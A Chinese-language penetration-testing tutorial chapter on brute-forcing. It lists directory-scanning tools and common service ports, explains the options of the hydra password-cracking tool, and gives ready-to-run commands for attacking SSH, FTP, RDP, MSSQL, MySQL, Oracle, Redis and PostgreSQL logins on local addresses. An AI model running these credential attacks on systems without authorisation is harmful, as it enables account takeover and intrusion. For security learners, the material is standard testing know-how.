38.窮舉篇一 窮舉爆破神器hydra詳細講解和利用

1、檔案和目錄窮舉

01 Pker多線程背景極速掃描工具V2.01修正版
02 禦劍
03 dirbuster
           

2、常見的端口服務

http 80
https 443
ftp 21
ssh 22
mysql 3306
mssql 1433
rsync 873
oracle 1521
mongo 28017
redis 6379
tomcat 8080
smtp 25
POP3 110
dns 53
telent 23
vnc 5900
pcanywhere 5632
Apache/Tomcat/Nginx/Axis2/resin/jboss 80|8080
WebLogic 7001
Jenkins 8080 8089
SNMP 161
Zabbix 8069
elasticsearch 9200 9300
rdp 3389
           

3、常見端口服務窮舉

01 窮舉爆破神器hydra：https://www.thc.org/


02 下載下傳位址：https://www.thc.org/releases/hydra-8.4.tar.gz


03 kali的hydra工具：
	hydra -h
		hydra [[[-l LOGIN|-L FILE] [-p PASS|-PFILE]] | [-C FILE]] [-e ns]
		
		[-o FILE] [-t TASKS] [-M FILE [-T TASKS]][-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
		
		-R 繼續從上一次進度接着破解。
		
		-S 采用SSL連結。
		
		-s PORT 可通過這個參數指定非預設端口。
		
		-l LOGIN 指定破解的使用者，對特定使用者破解。
		
		-L FILE 指定使用者名字典。
		
		-p PASS 小寫，指定密碼破解，少用，一般是采用密碼字典。
		
		-P FILE 大寫，指定密碼字典。
		
		-e ns 可選選項，n：空密碼試探，s：使用指定使用者和密碼試探。
		
		-C FILE 使用冒号分割格式，例如“登入名:密碼”來代替-L/-P參數。
		
		-M FILE 指定目标清單檔案一行一條。
		
		-o FILE 指定結果輸出檔案。
		
		-f 在使用-M參數以後，找到第一對登入名或者密碼的時候中止破解。
		
		-t TASKS 同時運作的線程數，預設為16。
		-w TIME 設定最大逾時的時間，機關秒，預設是30s。
		
		-v / -V 顯示詳細過程。
		
		service 指定服務名，支援的服務和協定：telnetftp pop3[-ntlm] imap[-ntlm] smb smbnt 
		http-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc 
		ldap2 ldap3 mssql mysql oracle-listenerpostgres nntp socks5 rexec 
		rlogin pcnfs snmp rsh cvs svn icq sapr3 sshsmtp-auth[-ntlm] pcanywhere 
		teamspeak sip vmauthd firebird ncp afp等等。


04 hydra窮舉爆破
	ssh服務的爆破：
	hydra -L /root/user -P /root/passwd ssh://192.168.1.0 -f -o /root/crack.txt -V
	hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f
	hydra -L /root/user -P /root/passlist ssh://192.168.0.112 -vV -f -o /root/crack.txt
	
	ftp服務的爆破
	hydra -L /root/user -P /root/passwd ftp://192.168.1.0 -f -o /root/crack.txt -V
	hydra -L /root/user -P /root/passlist ftp://192.168.0.106 -vV -f -o /root/crack.txt
	
	rdp服務的爆破：hydra不可以爆破
	hydra -L /root/user -P /root/passwd rdp://192.168.1.0 -f -o /root/crack.txt -V
	
	mssql服務的爆破
	hydra -L /root/user -P /root/passwd mssql://192.168.0.129 -f -o /root/crack.txt -v
	hydra -l sa -P /root/passlist mssql://192.168.0.103 –vV
	
	mysql服務的爆破
	hydra -L /root/user -P /root/passwd mysql://192.168.0.129 -f -o /root/crack.txt –v -s 3306
	
	oracle服務的爆破
	hydra -P /root/passwd oracle://192.168.0.129 -f -o /root/crack.txt –v
	redis服務的爆破
	hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 redis
	
	postgresql服務的爆破弱密碼檢測
	hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 postgresql
	
	指定多個ip進行窮舉
	hydra -L /root/user -P /root/passlist -M /root/ip.txt  -V -o /root/crack.txt mysql -t 16
           

2021.08.05 (0:24:07)